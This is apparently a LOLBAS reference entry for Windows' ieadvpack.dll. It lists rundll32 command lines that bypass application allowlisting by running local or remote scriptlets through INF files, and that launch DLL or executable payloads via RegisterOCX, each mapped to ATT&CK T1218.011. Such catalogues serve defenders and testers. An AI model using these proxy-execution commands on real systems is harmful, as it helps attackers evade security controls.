.. /Ieadvpack.dll
Star

AWL bypass
Execute (DLL)

INF installer for Internet Explorer. Has much of the same functionality as advpack.dll.

Paths:

Resources:

Acknowledgements:

Detections:

AWL bypass

  1. Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).

    rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
    Use case
    Run local or remote script(let) code through INF file specification.
    Privileges required
    User
    Operating systems
    Windows 10, Windows 11
    ATT&CK® technique
    T1218.011
  2. Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).

    rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,
    Use case
    Run local or remote script(let) code through INF file specification.
    Privileges required
    User
    Operating systems
    Windows 10, Windows 11
    ATT&CK® technique
    T1218.011

Execute

  1. Launch a DLL payload by calling the RegisterOCX function.

    rundll32.exe ieadvpack.dll,RegisterOCX test.dll
    Use case
    Load a DLL payload.
    Privileges required
    User
    Operating systems
    Windows 10, Windows 11
    ATT&CK® technique
    T1218.011
    Tags
    Execute: DLL
    This LOLBAS executes Dynamic-Link Libraries (DLLs).
  2. Launch an executable by calling the RegisterOCX function.

    rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
    Use case
    Run an executable payload.
    Privileges required
    User
    Operating systems
    Windows 10, Windows 11
    ATT&CK® technique
    T1218.011
  3. Launch command line by calling the RegisterOCX function.

    rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"
    Use case
    Run an executable payload.
    Privileges required
    User
    Operating systems
    Windows 10, Windows 11
    ATT&CK® technique
    T1218.011